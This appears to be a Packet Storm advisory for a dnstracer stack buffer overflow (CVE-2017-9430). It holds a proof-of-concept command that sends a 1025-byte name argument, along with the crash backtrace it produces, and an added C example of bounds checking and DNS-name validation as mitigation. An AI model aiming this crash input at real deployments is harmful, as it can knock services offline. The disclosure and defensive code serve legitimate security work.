ID PACKETSTORM:142799
Type packetstorm
Reporter Hosein Askari
Modified 2017-06-05T00:00:00
Description
`################
#Exploit Title: DNSTracer Stack-based Buffer Overflow
#CVE: CVE-2017-9430
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://www.mavetju.org
#Version : 1.8.1
#Tested on: Parrot OS
#Date: 04-06-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows
attackers to cause a denial of service (application crash) or possibly have
unspecified other impact via a command line with a long name argument that
is mishandled in a strcpy call for argv[0]. An example threat model is a
web application that launches dnstracer with an untrusted name string.
###############################
#dnstracer -v $(python -c 'print "A"*1025')
*** buffer overflow detected ***: dnstracer terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
Aborted
`
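The two checks that address the advisory's description, as an added example (not dnstracer's code and not the reporter's): a bounded copy in place of the unchecked `strcpy`, and a name validator a calling web application could apply before launching the tool. `NAME_BUF`, the function names and the 1024-byte size are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF      1024  /* assumed size; the advisory does not state the real one */
#define DNS_NAME_MAX  253   /* longest textual DNS name */
#define DNS_LABEL_MAX 63    /* longest single label */

/* Pattern described in the advisory, kept as a comment only:
 *     char name[NAME_BUF]; strcpy(name, argv[0]);   (no length check) */

/* Bounded copy: 0 on success, -1 when src plus its NUL does not fit in dst. */
int copy_name_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len = 0;
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    while (len < dstsize && src[len] != '\0')
        len++;
    if (len == dstsize)
        return -1;               /* no room for the terminator: reject, copy nothing */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Caller-side check for the web-application threat model: accept only
 * plausible DNS names before they are placed on a command line. */
int is_valid_dns_name(const char *name)
{
    size_t i, label = 0;
    if (name == NULL || name[0] == '\0')
        return 0;
    for (i = 0; name[i] != '\0'; i++) {
        char c = name[i];
        if (i >= DNS_NAME_MAX || (label == 0 && c == '-'))
            return 0;            /* too long, or label starts like an option */
        if (c == '.') {
            if (label == 0)
                return 0;        /* leading dot or empty label */
            label = 0;
            continue;
        }
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-' || c == '_'))
            return 0;
        if (++label > DNS_LABEL_MAX)
            return 0;
    }
    return 1;
}

/* Constructed input: n 'A' bytes. Bit 0 = copy accepted, bit 1 = name valid. */
int check_repeated_name(size_t n)
{
    static char src[4096];
    char dst[NAME_BUF];
    if (n >= sizeof src)
        return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    return (copy_name_checked(dst, sizeof dst, src) == 0 ? 1 : 0) |
           (is_valid_dns_name(src) ? 2 : 0);
}

int main(void)
{
    printf("1025: %d, 63: %d\n", check_repeated_name(1025), check_repeated_name(63));
    return 0;
}
```

The 1023-byte case shows why both layers matter: the string fits the buffer, yet it is still not a valid DNS name and the caller-side check rejects it.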